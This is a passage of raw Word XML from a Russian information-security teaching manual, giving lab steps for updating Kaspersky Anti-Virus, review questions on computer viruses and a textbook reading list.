    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если параметры Вашей сети совпадают с предложенными по умо</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>л</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">чанию, нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отмена</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, если в них были внесены изменения - </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Применить</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008120" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139" name="Рисунок 139" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/14/5-10.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId295" r:link="rId296">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 xml:space="preserve">Выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим запуска Автоматически</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>менить</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ок</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Главном окне</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> интерфейса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите раздел </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервис</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, затем подраздел </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обновления</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</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40" name="Рисунок 140" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/14/5-12.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId297" r:link="rId298">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 xml:space="preserve">Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1272540" cy="205740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="141" name="Рисунок 141" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/14/5-12.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId297" r:link="rId298">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="73279" t="68520" r="3098" b="26439"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1272540" cy="205740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для запуска процедуры Обновл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если на вашем компьютере отсутствует подключение к Интернет, и попытка обновления не удалась, то появится примерно следующая ошибка</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42" name="Рисунок 142" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/14/5-13.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId299" r:link="rId300">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Если подключение к сети Интернет присутствует на вашем комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ютере, начнется процесс обновления и по завершению будет выведено сообщ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ние «Обновление завершено успешно»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4671060" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="143" name="Рисунок 143" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/14/5-17.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId301" r:link="rId302">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4671060" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Контрольные вопросы и задания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к занятию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>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Default="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="005544D1" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005544D1">
        <w:t>Проблема защиты информации от вредоносного программного обеспеч</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:t>ния.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="005544D1" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005544D1">
        <w:t>Определение компьютерного вируса. Классификация компьютерных вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005544D1">
        <w:t>Пути распространения компьютерных вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="005544D1" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="005544D1" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005544D1">
        <w:t>Формы проявления компьютерных вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005544D1">
        <w:t>Разработка, публикация и распространение компьютерных вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="005544D1" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>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Default="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="005544D1" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Комплекс мер по выходу из кризисных ситуаций, обусловленных действиями вред</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>носного программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005544D1">
        <w:t xml:space="preserve">Структура и процесс загрузки </w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:t>-программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="005544D1" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="005544D1" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Структуры </w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PSP</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DTA</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> и окружение </w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="005544D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="173" w:name="_Toc3811365"/>
      <w:r>
        <w:t>Список рекомендуемых источников</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="002C1237"/>
    <w:p w:rsidR="002C1237" w:rsidRPr="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основная литература:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.Белов Е.Б., Пржегорлинский В.Н. Организационно-правовое обеспечение информационной безопасности: учеб. пособие для СПО/ Е.Б. Белов, В.Н. Пржегорлинский .-М.: ИЦ «Академия», 2017.- 336с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="009B2EC0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Информационная безопасность компьютерных систем и сетей</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: Учебное пособие / Шаньгин В. Ф. - М.: ИД ФОРУМ, НИЦ ИНФРА-М, 2016. - 416 с.: 60x90 1/16. - (Профессиональное образование) (Переплёт 7БЦ) ISBN 978-5-8199-0331-5 - Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId303" w:history="1">
        <w:r w:rsidRPr="009B2EC0">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://znanium.com/catalog/product/549989</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="009B2EC0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3. Информационная безопасность компьютерных систем и сетей</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> : учеб. пособие / В.Ф. Шаньгин. — М. : ИД «ФОРУМ» : ИНФРА-М, 2018. — 416 с. — (Среднее профессиональное образование). - Режим доступа:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId304" w:history="1">
        <w:r w:rsidRPr="009B2EC0">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://znanium.com/catalog/product/945331</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="009B2EC0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дополнительная литература:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="009B2EC0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="0"/>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Основные положения информационной безопасности</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2EC0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: Учебное пособие/В.Я.Ищейнов, М.В.Мецатунян - М.: Форум, НИЦ ИНФРА-М, 2015. - 208 с.: 60x90 1/16. - (Профессиональное образование) (Обложка) ISBN 978-5-00091-079-5 - Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId305" w:history="1">
        <w:r w:rsidRPr="009B2EC0">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://znanium.com/catalog/product/508381</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="009B2EC0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
